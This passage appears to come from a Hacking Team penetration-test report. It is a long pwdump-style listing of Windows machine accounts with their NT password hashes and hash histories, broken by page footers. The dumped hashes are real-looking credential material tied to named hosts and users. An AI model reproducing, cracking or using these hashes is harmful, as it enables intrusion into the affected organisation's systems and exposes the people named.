MBIAZZO$_history_5:1358:NO PASSWORD*********************:27CA298BAF8C1F9FF0E9E7D580349F9A:::
MBIAZZO$_history_6:1358:NO PASSWORD*********************:A3EABFD92D4898AEBB6A7FFE3B378A59:::
MBIAZZO$_history_7:1358:NO PASSWORD*********************:6E37AB6EC582D6369524749D75E12C0F:::
MBIAZZO$_history_8:1358:NO PASSWORD*********************:C5D029E47DA5422B2A26370169F24109:::
MBIAZZO$_history_9:1358:NO PASSWORD*********************:D5CAFA8C8DF69CDAAA26B0D6C1FD93A3:::
MBIAZZO$_history_10:1358:NO PASSWORD*********************:41A56FA99C151C16007164D2915193C6:::
PSANTA$:1360:NO PASSWORD*********************:57BC6EA4D75140D8329662522ACCA7F2:::
PSANTA$_history_0:1360:NO PASSWORD*********************:6F75E6F575BED926C62350DEDDD7E3F2:::
PSANTA$_history_1:1360:NO PASSWORD*********************:41DF0FA846C88032A2A7336284CF5659:::
PSANTA$_history_2:1360:NO PASSWORD*********************:E734A4142E40684C4C5B0B789DB3F881:::
PSANTA$_history_3:1360:NO PASSWORD*********************:97129D789827A82ACED07A96021FA9A5:::
PSANTA$_history_4:1360:NO PASSWORD*********************:B2BE521C3F973BE17BE8685F8407694A:::
PSANTA$_history_5:1360:NO PASSWORD*********************:1A2814B529D42CBDD1B386F13382DB97:::
PSANTA$_history_6:1360:NO PASSWORD*********************:17F556D450F938B309701B43432D37A5:::
PSANTA$_history_7:1360:NO PASSWORD*********************:C4704AE7E56C8C1AF8F9CBE66ADA6BEA:::
PSANTA$_history_8:1360:NO PASSWORD*********************:3C5BD62D13B03F42CA275135C8AF13EA:::
PSANTA$_history_9:1360:NO PASSWORD*********************:84D3645B7D683CC2B4068D33FC93FDA3:::
PSANTA$_history_10:1360:NO PASSWORD*********************:61202BCD9978B7FA4E8FEE0272A21A6E:::
PCAMBIERI$:1366:NO PASSWORD*********************:70C9488A941986AEB48EF5ABCDD53204:::
PCAMBIERI$_history_0:1366:NO PASSWORD*********************:AB11F870026F7F1F40E09BEF3B34F186:::
PCAMBIERI$_history_1:1366:NO PASSWORD*********************:69F4A36A4EED694E3A6555A5079287FA:::
PCAMBIERI$_history_2:1366:NO PASSWORD*********************:F22D25C7CB44BC21A86E8E9BD6434494:::
PCAMBIERI$_history_3:1366:NO PASSWORD*********************:428C7227D5D187397A28BE4D7A783ADC:::
PCAMBIERI$_history_4:1366:NO PASSWORD*********************:D270E326F7F3321FA3E4CF24CB262E7D:::
PCAMBIERI$_history_5:1366:NO PASSWORD*********************:2F29D4018879EE3A2AB38BF1A8F4A7C2:::
PCAMBIERI$_history_6:1366:NO PASSWORD*********************:DA51EE032847C0EFD190CD1A7EF2E4AA:::
PCAMBIERI$_history_7:1366:NO PASSWORD*********************:D19C0DDF2C73AF5CF59113EF290A9F60:::
PCAMBIERI$_history_8:1366:NO PASSWORD*********************:FE1E06C3A48A2BBEFE8DA8E822ED5225:::
PCAMBIERI$_history_9:1366:NO PASSWORD*********************:5630E7DE71ACCB2E362F851A1D61225A:::
PCAMBIERI$_history_10:1366:NO PASSWORD*********************:E0A08CE2C973967BB70D496F9F23EB9E:::
FCAMPANELLA$:1369:NO PASSWORD*********************:1FDA3AC2DAC534C7DCC49E093A3A3952:::
FCAMPANELLA$_history_0:1369:NO PASSWORD*********************:FB9A0B258C19031531D6E60BE41DE8B1:::
FCAMPANELLA$_history_1:1369:NO PASSWORD*********************:7AD4719B1CDFF1CD47BA439230EC3B71:::
FCAMPANELLA$_history_2:1369:NO PASSWORD*********************:951BB48878827FAB564B38E9D32F0C70:::
FCAMPANELLA$_history_3:1369:NO PASSWORD*********************:0543ED93B2D03B737AEC759E5EBBE473:::
FCAMPANELLA$_history_4:1369:NO PASSWORD*********************:3A70E33658D9013D16D507FDE7CF1256:::
FCAMPANELLA$_history_5:1369:NO PASSWORD*********************:F8710C93F9BF2FFC3BB5B00DB5E8F493:::
FCAMPANELLA$_history_6:1369:NO PASSWORD*********************:7C76DFEA3A92DA274E2D0A26165FCFDC:::
FCAMPANELLA$_history_7:1369:NO PASSWORD*********************:C272C8036593FF2EC39EDEC1F3DFA212:::
FCAMPANELLA$_history_8:1369:NO PASSWORD*********************:B50EE7D1DB4D93E49BC1CD99D14FB4F6:::
FCAMPANELLA$_history_9:1369:NO PASSWORD*********************:CC1BA497C2EAA151E74B1D027FCA75C2:::
FCAMPANELLA$_history_10:1369:NO PASSWORD*********************:BBAFB89322A52F8616D9441499FDA8DA:::
CMALERBA$:1370:NO PASSWORD*********************:68C207B691ED7EC7E853C85842B941B0:::
CMALERBA$_history_0:1370:NO PASSWORD*********************:018926FF31D8A22766823BA13F8C8422:::
CMALERBA$_history_1:1370:NO PASSWORD*********************:66FD8A4CE5D8C2059E151955DDB4E139:::
CMALERBA$_history_2:1370:NO PASSWORD*********************:905FAB095B88718EE2B4651C5BB87F72:::
CMALERBA$_history_3:1370:NO PASSWORD*********************:31D5A04BD6BF97BFA9A7E22BDB9CDD28:::
CMALERBA$_history_4:1370:NO PASSWORD*********************:E43D8FC01110C081FBE2391263D66447:::
CMALERBA$_history_5:1370:NO PASSWORD*********************:46B0DEDD89D4C0AE97BB456224BB6186:::
CMALERBA$_history_6:1370:NO PASSWORD*********************:A52C1B2C02DFE600E2671F2E468C486A:::
CMALERBA$_history_7:1370:NO PASSWORD*********************:6E6795145D62CA359769F4F9CC77FDC9:::
CMALERBA$_history_8:1370:NO PASSWORD*********************:845A5495AAF010BFFD0D92720C6FCC31:::
CMALERBA$_history_9:1370:NO PASSWORD*********************:9A7CAC6C5B6289708D5A818CAE36C932:::
CMALERBA$_history_10:1370:NO PASSWORD*********************:D2410B5AD6163A13DC5E33301087DA0E:::
MNAPOLETANO-LAP$:1371:NO PASSWORD*********************:7872DD05B1C29B2603D841968162AD1E:::
MNAPOLETANO-LAP$_history_0:1371:NO PASSWORD*********************:D2559A5BC7ED1F4505C594DF3C1BE901:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 430 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MNAPOLETANO-LAP$_history_1:1371:NO PASSWORD*********************:F4FE036982EA8A03662909CE12B552AC:::
MNAPOLETANO-LAP$_history_2:1371:NO PASSWORD*********************:FAE3CC2E7EF9C115D67E90E691B8DA6C:::
MNAPOLETANO-LAP$_history_3:1371:NO PASSWORD*********************:029598127EF7D2BD1406F9D3DE657004:::
MNAPOLETANO-LAP$_history_4:1371:NO PASSWORD*********************:B95342F3B6D38E56BE3C74B78949733C:::
MNAPOLETANO-LAP$_history_5:1371:NO PASSWORD*********************:BD8C96A0901B424B219D4E29323306F2:::
MNAPOLETANO-LAP$_history_6:1371:NO PASSWORD*********************:B3F427FFC96438CF3045467C6C601C30:::
MNAPOLETANO-LAP$_history_7:1371:NO PASSWORD*********************:F1BFF40A979B99034B7AEBFE904D99D8:::
MNAPOLETANO-LAP$_history_8:1371:NO PASSWORD*********************:F9CDE83404856E9D13444FB9034F0C74:::
MNAPOLETANO-LAP$_history_9:1371:NO PASSWORD*********************:A5379A8258235BBD46D152C1B696D6C3:::
MNAPOLETANO-LAP$_history_10:1371:NO PASSWORD*********************:9A36CC24EBBC098912F064E8F246B6AF:::
RSD4-9-3-0TS5-1$:1372:NO PASSWORD*********************:285B8DA73FCF92FAF38EC4B606E60F8C:::
RSD4-9-3-0TS5-1$_history_0:1372:NO PASSWORD*********************:E80E3825AE535FDF88E07253C429D337:::
RSD4-9-3-0TS5-1$_history_1:1372:NO PASSWORD*********************:0F9BC531A9CC52DFCD684F80CA59A774:::
RSD4-9-3-0TS5-1$_history_2:1372:NO PASSWORD*********************:74B481C1709016405FE9E9B877FFD7DB:::
RSD4-9-3-0TS5-1$_history_3:1372:NO PASSWORD*********************:229C6C34DD466E364F1FB4FC7F9E9D28:::
RSD4-9-3-0TS5-1$_history_4:1372:NO PASSWORD*********************:6A9762A2C3CA4F17D190BFF5A7F295AB:::
RSD4-9-3-0TS5-1$_history_5:1372:NO PASSWORD*********************:520BA7FDDD6F2C357BEBCA39D910070E:::
RSD4-9-3-0TS5-1$_history_6:1372:NO PASSWORD*********************:EB78EB5BA18BB219A87C507C07376479:::
RSD4-9-3-0TS5-1$_history_7:1372:NO PASSWORD*********************:DC47FF1C697D1F03DB974AE047F9D927:::
RSD4-9-3-0TS5-1$_history_8:1372:NO PASSWORD*********************:C5BB2EC0830CB7101594041B27CCFFC5:::
RSD4-9-3-0TS5-1$_history_9:1372:NO PASSWORD*********************:DEDF5AB7C99F4D1BBAD8E88B70C041F4:::
RSD4-9-3-0TS5-1$_history_10:1372:NO PASSWORD*********************:2637BEE6A151E5AEA4EF203C5625D346:::
TESTBACKUP$:1373:NO PASSWORD*********************:6DF2BA94117CCE147C07746684E322AB:::
TESTBACKUP$_history_0:1373:NO PASSWORD*********************:F1A2B7BC0DCECA811CCA58C0472E0689:::
TESTBACKUP$_history_1:1373:NO PASSWORD*********************:5EC5BDFFD4EA90D9920B1A05B291AFF8:::
TESTBACKUP$_history_2:1373:NO PASSWORD*********************:4064D7510328F3865601AF3DFB4516D3:::
TESTBACKUP$_history_3:1373:NO PASSWORD*********************:E0CC1B6182F323D18371D6F4A3AAA002:::
TESTBACKUP$_history_4:1373:NO PASSWORD*********************:CA6BEA70EEEEFE3FF91017F16888F03E:::
TESTBACKUP$_history_5:1373:NO PASSWORD*********************:DEC198E84744F571D2856F2F161307F7:::
TESTBACKUP$_history_6:1373:NO PASSWORD*********************:27C5BAF2A4D8A2C53585CAD2F2E1764C:::
TESTBACKUP$_history_7:1373:NO PASSWORD*********************:C85C3728F4E6403FFB6D8E0B5416DF73:::
TESTBACKUP$_history_8:1373:NO PASSWORD*********************:4025985D4455C36835A8F7E0F281BE2E:::
TESTBACKUP$_history_9:1373:NO PASSWORD*********************:3860FD7C605D3DC56C22BFDC27BD22D3:::
TESTBACKUP$_history_10:1373:NO PASSWORD*********************:1AA92B6781D1DF297B240B932C96F528:::
MSAVOIA-LAP$:1375:NO PASSWORD*********************:005A31C9BE3049AE5897CBBE3C6E2AA9:::
MSAVOIA-LAP$_history_0:1375:NO PASSWORD*********************:3BA34C615E56B09F120D27BF495EA412:::
MSAVOIA-LAP$_history_1:1375:NO PASSWORD*********************:2CAB68991DE451DDA96B228FE523B3E4:::
MSAVOIA-LAP$_history_2:1375:NO PASSWORD*********************:EDDD82B0E59F35FD2CAD2E3FED182C6E:::
ROMEGUEST01$:1384:NO PASSWORD*********************:4E0089E3F534F07E57297C5DEA295D87:::
DMASELLA$:1385:NO PASSWORD*********************:910C8BB70CFF8F0C952906501CE7974E:::
DMASELLA$_history_0:1385:NO PASSWORD*********************:0CA23F16FDE856DFF997416C06E66AA9:::
DMASELLA$_history_1:1385:NO PASSWORD*********************:4CD50D222B8C94D5736DDDAE61C544A9:::
DMASELLA$_history_2:1385:NO PASSWORD*********************:D5CA217B6C49309FF8AD96587D90BADA:::
DMASELLA$_history_3:1385:NO PASSWORD*********************:48BBD20BCF736C0B6EB6FC0EA290D9E3:::
DMASELLA$_history_4:1385:NO PASSWORD*********************:F5A61D11D0F81AE5DFF28EFD7F538FE7:::
DMASELLA$_history_5:1385:NO PASSWORD*********************:485851FFF26AD872D3B652F0FDFA78E9:::
DMASELLA$_history_6:1385:NO PASSWORD*********************:B8E1C008628D7CA7E93278277F4889A9:::
DMASELLA$_history_7:1385:NO PASSWORD*********************:E6E3EFC308D2D7E219AA052F0747BE16:::
DMASELLA$_history_8:1385:NO PASSWORD*********************:618795F8B3C741C75DDF3317BD142848:::
VCASULLI$:1386:NO PASSWORD*********************:7FD354CC5448FD8D6E3B4AF1734BF8CD:::
VCASULLI$_history_0:1386:NO PASSWORD*********************:F804D1E2D9C0EA922099F2BD7F1335C1:::
VCASULLI$_history_1:1386:NO PASSWORD*********************:1E50DD1F302B6D9A48E78C8DF6EB376B:::
VCASULLI$_history_2:1386:NO PASSWORD*********************:8BEAE27E6A8EFFD80D07387F2DAEAFC5:::
VCASULLI$_history_3:1386:NO PASSWORD*********************:B4FEEE73CFDF884DC78C401EC2304A86:::
VCASULLI$_history_4:1386:NO PASSWORD*********************:C3648A92934754AE08266E7CA8644F94:::
VCASULLI$_history_5:1386:NO PASSWORD*********************:62FF29553AD74E5B033A6FF362A493B0:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 431 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
VCASULLI$_history_6:1386:NO PASSWORD*********************:FD47AAFA22A0EA9756AC52C6269E1EB9:::
VCASULLI$_history_7:1386:NO PASSWORD*********************:B6A9F2B9034AE5B36E62508466BB6390:::
VCASULLI$_history_8:1386:NO PASSWORD*********************:18C94F775D228D637632CF4617DE513A:::
VCASULLI$_history_9:1386:NO PASSWORD*********************:71CDB4D8B6CC6BE4FA9DD241DA37A525:::
NEWLPBLOOM$:1399:NO PASSWORD*********************:7EAEF08B3938846AEE1B15314ADADF37:::
NEWLPBLOOM$_history_0:1399:NO PASSWORD*********************:1FA8E82A89C86F701C9C429E7E5A3930:::
NEWLPBLOOM$_history_1:1399:NO PASSWORD*********************:5296AB07450618A94833EBC4573336E1:::
NEWLPBLOOM$_history_2:1399:NO PASSWORD*********************:CEB063DB902467AF3E653BC1A800C89D:::
NEWLPBLOOM$_history_3:1399:NO PASSWORD*********************:8AC5DAED82292A37299CF5C19A9BBC54:::
NEWLPBLOOM$_history_4:1399:NO PASSWORD*********************:36B662FF100A0B13F0E702494F202A35:::
NEWLPBLOOM$_history_5:1399:NO PASSWORD*********************:C8A1027CA73D4C962319635705B8E680:::
NEWLPBLOOM$_history_6:1399:NO PASSWORD*********************:58298898CD63D3D3E39EB53876849F3B:::
NEWLPBLOOM$_history_7:1399:NO PASSWORD*********************:407FCF0D4760FFD279136538DC6A1CBA:::
NEWLPBLOOM$_history_8:1399:NO PASSWORD*********************:384CBE1D57EA6C469988B3E4A8C41854:::
MILSIAWS03$:1403:NO PASSWORD*********************:840C58AE762F7F8F00A4FD5818FD0F87:::
MILSIAWS03$_history_0:1403:NO PASSWORD*********************:0271ACD83A290D930E1F7AC34AAF0780:::
MILSIAWS03$_history_1:1403:NO PASSWORD*********************:879068772EAE4B7300861DFC2CA1A0E7:::
MILSIAWS03$_history_2:1403:NO PASSWORD*********************:BDE5AD1AA259AD65FE89E0DA359CA45C:::
MILSIAWS03$_history_3:1403:NO PASSWORD*********************:BDAAE8F7AB2BF412D49D69215594A749:::
MILSIAWS03$_history_4:1403:NO PASSWORD*********************:E2D3BE360B13172772C3A2D6DEACAFC7:::
MILSIAWS03$_history_5:1403:NO PASSWORD*********************:4AFB1D81A725007D662FB2FA5EF47E41:::
MILSIAWS03$_history_6:1403:NO PASSWORD*********************:42CF0DE4CCD5AD941360679268F7E02C:::
MILSIAWS03$_history_7:1403:NO PASSWORD*********************:23484D5B9A4862F28564A655FC1DF888:::
MILSIAWS03$_history_8:1403:NO PASSWORD*********************:607D738D159D66C9A12E9BB80CD1D537:::
LSPAVENTA$:1404:NO PASSWORD*********************:BB4383AFE5F9EC2224596B218A71BD05:::
LSPAVENTA$_history_0:1404:NO PASSWORD*********************:C25193DE77AAECB2D6DAFAFA0165951A:::
LSPAVENTA$_history_1:1404:NO PASSWORD*********************:A1B0D4B4E58A4C97EE69F79D52D2CFC3:::
LSPAVENTA$_history_2:1404:NO PASSWORD*********************:A5FA6B4A192972F82B8B5B5EF7607632:::
MTSDRWINDC1$:1407:NO PASSWORD*********************:EEF54668429FF65B532E8AB552B33038:::
MTSDRWINDC1$_history_0:1407:NO PASSWORD*********************:1E35A945F3EE54227329BF78718BCD57:::
MTSDRWINDC1$_history_1:1407:NO PASSWORD*********************:856CDCF78325E78A39B022639DC4D8A6:::
MTSDRWINDC1$_history_2:1407:NO PASSWORD*********************:59F797A693263C0021FE58B3AC531B4E:::
MTSDRWINDC1$_history_3:1407:NO PASSWORD*********************:34BA1F881D9B26C83BC5C2552B76B77F:::
MTSDRWINDC1$_history_4:1407:NO PASSWORD*********************:F8D21422A78F215680898188BC70A0AD:::
MTSDRWINDC1$_history_5:1407:NO PASSWORD*********************:58589B44DD174C6E011E980A5DBC5B45:::
MTSDRWINDC1$_history_6:1407:NO PASSWORD*********************:62418DCE422548CA7B29E16A1E199D3A:::
LGUASCO-LAP$:1408:NO PASSWORD*********************:8AFE2B3D834CB39AE589168D2344C028:::
LGUASCO-LAP$_history_0:1408:NO PASSWORD*********************:77A50422B70E5816F58FF9272652C160:::
LGUASCO-LAP$_history_1:1408:NO PASSWORD*********************:F6C4E233168CFD792609BE7F0B4BC583:::
LGUASCO-LAP$_history_2:1408:NO PASSWORD*********************:187A4563F5258A691E8B9A55FB23C3E3:::
LGUASCO-LAP$_history_3:1408:NO PASSWORD*********************:896F2C415C8DF47FC41ED2A4ECAFC88A:::
LGUASCO-LAP$_history_4:1408:NO PASSWORD*********************:3447172707E50459A908E6E627330AD6:::
LGUASCO-LAP$_history_5:1408:NO PASSWORD*********************:1D0CEEDEE8697933774CAAB31997FB98:::
LGUASCO-LAP$_history_6:1408:NO PASSWORD*********************:5BAB001F9B9645FE3EAFF1ADB8A2007B:::
LGUASCO-LAP$_history_7:1408:NO PASSWORD*********************:D8840EE9D91DA518E9059BAD264B2201:::
SMANTOVANI$:1409:NO PASSWORD*********************:68BAA686102D0DDA1C4E5BB2DFA31860:::
SMANTOVANI$_history_0:1409:NO PASSWORD*********************:41B4358FCFB63D56416B8791C8C528F3:::
SMANTOVANI$_history_1:1409:NO PASSWORD*********************:342A30149824CCB3A5A9A3EFFB05C05A:::
SMANTOVANI$_history_2:1409:NO PASSWORD*********************:6FE839DB6D6947E15F4BC862FE0D31D7:::
SMANTOVANI$_history_3:1409:NO PASSWORD*********************:2413A5BEBDC027CBE67AE277F811ED1D:::
SMANTOVANI$_history_4:1409:NO PASSWORD*********************:F0222ED60A129D460B9677213D8C6A45:::
SMANTOVANI$_history_5:1409:NO PASSWORD*********************:6EE24324EA21971B2E452DB9BB16C797:::
SMANTOVANI$_history_6:1409:NO PASSWORD*********************:FBC18999472C66A9B64EC306C694E8D5:::
HMAATUGH$:1410:NO PASSWORD*********************:C9DE442C80647BDC35F36AC712F67D8F:::
HMAATUGH$_history_0:1410:NO PASSWORD*********************:DC614452E42867E729F79604F6F4218E:::
HMAATUGH$_history_1:1410:NO PASSWORD*********************:7BF5F3BCBC977B7907E124CE452882EF:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 432 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
HMAATUGH$_history_2:1410:NO PASSWORD*********************:DA1C8817B4AF99745F1C4B48DB27B4BC:::
HMAATUGH$_history_3:1410:NO PASSWORD*********************:1F3F7081406EDEA8893A7843E948BFF4:::
HMAATUGH$_history_4:1410:NO PASSWORD*********************:01E0BB4FD9E61DE4B4B3ADB73D4C99C0:::
HMAATUGH$_history_5:1410:NO PASSWORD*********************:1B7FD5A649E82321DC697E5C7E75FBF3:::
APASSONI$:1411:NO PASSWORD*********************:35583FD9B245D1A26FD6A320ACF83937:::
APASSONI$_history_0:1411:NO PASSWORD*********************:0FA1908FCAC80AA3060CB774354A5894:::
APASSONI$_history_1:1411:NO PASSWORD*********************:12DA500D91BBCEBE78B4766168C99EE5:::
APASSONI$_history_2:1411:NO PASSWORD*********************:317BF34E02BE405BF01C5BE32FB3A85C:::
APASSONI$_history_3:1411:NO PASSWORD*********************:A5C3B9853A6675E17E91C6E023757CA7:::
APASSONI$_history_4:1411:NO PASSWORD*********************:56C69A636580303EA472985EEDA40A9A:::
APASSONI$_history_5:1411:NO PASSWORD*********************:0ED3A5352286F130CC7C3B48B0532219:::
MRICCIARDI$:1414:NO PASSWORD*********************:9CBE27BB94DE98B361164E92ECF36AA4:::
MRICCIARDI$_history_0:1414:NO PASSWORD*********************:5A4FB3B4704D7E35F73968D92B0A2ED6:::
MRICCIARDI$_history_1:1414:NO PASSWORD*********************:ECE75AC6C26F29CBA04C3EF69DEFD0EC:::
MRICCIARDI$_history_2:1414:NO PASSWORD*********************:7D77DA780F84736FB55774FE9679A99B:::
MRICCIARDI$_history_3:1414:NO PASSWORD*********************:FE9DDA1B43DAE7A1B1F13E47C7193569:::
HMAATUGH-LAP$:1416:NO PASSWORD*********************:E310BE4C02906812D30BF3E0C7E5BB94:::
HMAATUGH-LAP$_history_0:1416:NO PASSWORD*********************:BB5DF12BA4ED5B87FA73B7A007348435:::
HMAATUGH-LAP$_history_1:1416:NO PASSWORD*********************:CD1B3F83247F1D88D53BDD857D1DD2A9:::
HMAATUGH-LAP$_history_2:1416:NO PASSWORD*********************:67EDDEC0198D7E6BDEE10948189238CB:::
HMAATUGH-LAP$_history_3:1416:NO PASSWORD*********************:616DFEF65FA8829108D27BF0D2F9A82E:::
MNOVIK$:1418:NO PASSWORD*********************:BC9FEBF53F33793F5D76607DDCC3AC5B:::
MNOVIK$_history_0:1418:NO PASSWORD*********************:68E2A87E6BC93C69348B874C97A572E5:::
CRENZI$:1422:NO PASSWORD*********************:0779670F076DA8640936CA2D88ACDE48:::
CRENZI$_history_0:1422:NO PASSWORD*********************:EB5CD97957FE6287DA09FDCF78AA32D6:::
PBIZZOCA$:1423:NO PASSWORD*********************:06AC40F49292FF536F9F64CEAB604C1A:::
PBIZZOCA$_history_0:1423:NO PASSWORD*********************:2B9C9071D5A5A59891509BDE0410D89B:::
TEST01$:1606:NO PASSWORD*********************:9CBD8CC4923AA23177B178007FC1B484:::
TEST01$_history_0:1606:NO PASSWORD*********************:1E8C84A07906B5D1DE58CEEB4F4AAE1B:::
TEST01$_history_1:1606:NO PASSWORD*********************:9978D40F4A20E79B4D585AA5B17CC6A3:::
TEST01$_history_2:1606:NO PASSWORD*********************:0F1030B177A6D9532B31889A1E297285:::
TEST01$_history_3:1606:NO PASSWORD*********************:D696B7E7D921C2D7CF48AEA1A0281572:::
TEST01$_history_4:1606:NO PASSWORD*********************:513B1E80A877EFE03007ACE371B017F4:::
TEST01$_history_5:1606:NO PASSWORD*********************:ABAB86B3CB3AF501E0F2DB518BFB22A5:::
TEST01$_history_6:1606:NO PASSWORD*********************:DF35AC04A275997498A00E4B31C756A4:::
TEST01$_history_7:1606:NO PASSWORD*********************:6E5FA64D4894255DCD750817AE9F3116:::
TEST01$_history_8:1606:NO PASSWORD*********************:3DA9D03D886CA96C994E80DAF60FAEBC:::
PC-WRITER$:1622:NO PASSWORD*********************:1E26FF1F122F4F16F48C96286CEA3B66:::
PC-WRITER$_history_0:1622:NO PASSWORD*********************:3565C9D1CB0CD17BA72744DD3670D400:::
PC-WRITER$_history_1:1622:NO PASSWORD*********************:B2FDE1408ED1914B5D080BC263D0D47D:::
PC-WRITER$_history_2:1622:NO PASSWORD*********************:B376935FF0B4572D8F79687AD8E58B0E:::
PC-WRITER$_history_3:1622:NO PASSWORD*********************:1E724C4555343FC8EC9E0F82ED1B6BE3:::
PC-WRITER$_history_4:1622:NO PASSWORD*********************:D20C91DE9F58B5CF7BCEF15C9D3CD4D4:::
PC-WRITER$_history_5:1622:NO PASSWORD*********************:422169750CC0568E1075EDB54CF693BB:::
PC-WRITER$_history_6:1622:NO PASSWORD*********************:D9BA8FAD48D76EFAC391F702C5D7A531:::
PC-WRITER$_history_7:1622:NO PASSWORD*********************:6E8D6B5E538721EA2D269BA8F30DCE5B:::
PC-WRITER$_history_8:1622:NO PASSWORD*********************:8A3B2A34B0FFEC27CF311B987B49AFE4:::
PC-WRITER$_history_9:1622:NO PASSWORD*********************:67F46480463DA4D8B425CA231ABB62D0:::
PC-WRITER$_history_10:1622:NO PASSWORD*********************:7B80B0F4E3620A181AC0B5C0062FA056:::
SMARCHETTI$:1627:NO PASSWORD*********************:2F980D1B22A821618F17F63233CF2CD6:::
SMARCHETTI$_history_0:1627:NO PASSWORD*********************:D59E40C13C721748B37B63CC2A781C11:::
SMARCHETTI$_history_1:1627:NO PASSWORD*********************:6B464AA9504C4CE75742C212C229D92A:::
SMARCHETTI$_history_2:1627:NO PASSWORD*********************:693A723E102BAFADAEE54BC11E930687:::
SMARCHETTI$_history_3:1627:NO PASSWORD*********************:6B31CCCADC364DB1453DCA5E393408A1:::
SMARCHETTI$_history_4:1627:NO PASSWORD*********************:70B8C9E7827B527E93B21008A5C5E096:::
SMARCHETTI$_history_5:1627:NO PASSWORD*********************:A3E95EE4F450D11B203817B0E7A264A0:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 433 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
SMARCHETTI$_history_6:1627:NO PASSWORD*********************:AE8977A6DD054D1AB28F49C2CA55AC77:::
SMARCHETTI$_history_7:1627:NO PASSWORD*********************:401673693ADB2A2FF3B10437D4C7B406:::
SMARCHETTI$_history_8:1627:NO PASSWORD*********************:16C9CD9EE1B80CEEAB614A2E6FC0D2A2:::
SMARCHETTI$_history_9:1627:NO PASSWORD*********************:86E96EC290ED55B2006B9A520238AF9C:::
SMARCHETTI$_history_10:1627:NO PASSWORD*********************:C566822660A8A749022843604855A21D:::
HELPDESK$:1629:NO PASSWORD*********************:6C4C3149361437331C40067CF7902421:::
HELPDESK$_history_0:1629:NO PASSWORD*********************:4110A9F227FAC41DA7D74B89E9407903:::
HELPDESK$_history_1:1629:NO PASSWORD*********************:95E18F95398D9A4E77533580F3CA1127:::
HELPDESK$_history_2:1629:NO PASSWORD*********************:5E0F649D41A75B5B06C6F1AA7AC6F107:::
HELPDESK$_history_3:1629:NO PASSWORD*********************:74ACDE2ED4135ED6C9BFB28337470599:::
HELPDESK$_history_4:1629:NO PASSWORD*********************:E0C26186BB8224979EFE301AD03F72EA:::
HELPDESK$_history_5:1629:NO PASSWORD*********************:4D13EE2C4F27025BAF323169962C36E2:::
HELPDESK$_history_6:1629:NO PASSWORD*********************:84C49A950C2F7F31496DBF5875D67196:::
HELPDESK$_history_7:1629:NO PASSWORD*********************:193B967FBE43F2D002A1F21FFDB7E056:::
HELPDESK$_history_8:1629:NO PASSWORD*********************:49B084308767DD3CFB471F1191C148FD:::
HELPDESK$_history_9:1629:NO PASSWORD*********************:C8300AD813A91A680933754112289A87:::
HELPDESK$_history_10:1629:NO PASSWORD*********************:353D74980F3A74D7595FF7FCB2BE9A2E:::
MVILLA$:1632:NO PASSWORD*********************:83C798C85102EB0EC1C0CC8C8DAD9209:::
MVILLA$_history_0:1632:NO PASSWORD*********************:CA03CEF3386515623D46C54BD2F29CA1:::
MVILLA$_history_1:1632:NO PASSWORD*********************:C7794B04FD107930EF9D1B2F11359A30:::
MVILLA$_history_2:1632:NO PASSWORD*********************:C41AD39EC7A61DE3680ADAAAE4AE18A7:::
MVILLA$_history_3:1632:NO PASSWORD*********************:87DB7F316DBA426CECFB2FF3DB00856F:::
MVILLA$_history_4:1632:NO PASSWORD*********************:4BFAFAA372E3CFA39734D233C272D5A6:::
MVILLA$_history_5:1632:NO PASSWORD*********************:F9BFDD8FA588A091F570F8A2D4BB7EF9:::
MVILLA$_history_6:1632:NO PASSWORD*********************:C5F8B9810353DFF66354C76BE9DCBC52:::
MVILLA$_history_7:1632:NO PASSWORD*********************:817B1F2F5AA31CDA241FEDC53DFD73B3:::
MVILLA$_history_8:1632:NO PASSWORD*********************:A49AE119F82A2EA2523B3587A5AB2C3A:::
MVILLA$_history_9:1632:NO PASSWORD*********************:29F796C97E3052F4432500352AE19730:::
MVILLA$_history_10:1632:NO PASSWORD*********************:DB4D5D3323537EAB953BE9ACACB90276:::
MTS-DEMO-1$:1635:NO PASSWORD*********************:45A9D62C5DBC14644E55D0611C58432C:::
MTS-DEMO-1$_history_0:1635:NO PASSWORD*********************:E04D98774B959FB5E555F2E946A256B5:::
MTS-DEMO-1$_history_1:1635:NO PASSWORD*********************:F83E36D98182B8A35AF8245E2EE49115:::
MTS-DEMO-1$_history_2:1635:NO PASSWORD*********************:FFB01B27E272F2AE917F6A267AD9F685:::
MTS-DEMO-1$_history_3:1635:NO PASSWORD*********************:FC075E5B947B1C4E0011427D39051C38:::
MTS-DEMO-1$_history_4:1635:NO PASSWORD*********************:151B72D335D81612F1476C94DCA9336C:::
MTS-DEMO-1$_history_5:1635:NO PASSWORD*********************:1F36459A27FB81B2D1F7E8CED440A0A6:::
MTS-DEMO-1$_history_6:1635:NO PASSWORD*********************:15D870694AC5738C4B9B68F2078D68C3:::
MTS-DEMO-1$_history_7:1635:NO PASSWORD*********************:260F7F0AFA68DF8B57CA0F665A25F4CE:::
MTS-DEMO-1$_history_8:1635:NO PASSWORD*********************:570EB6DBD4973EDF7E1B41FD7C1BF3F8:::
MTS-DEMO-1$_history_9:1635:NO PASSWORD*********************:0F0F343B3C20667B34A55886C96218B0:::
MTS-DEMO-1$_history_10:1635:NO PASSWORD*********************:29E5083FA025BA8C2B87C1DBC3D9A066:::
PCMIGRATE$:1640:NO PASSWORD*********************:96C08AD489FEC9900CBF22E65FC4C19E:::
PCMIGRATE$_history_0:1640:NO PASSWORD*********************:274837903EE4BEAC45EB8CF6CD5F6830:::
PCMIGRATE$_history_1:1640:NO PASSWORD*********************:A0182878EA79EC6AC67B38B4F43257A8:::
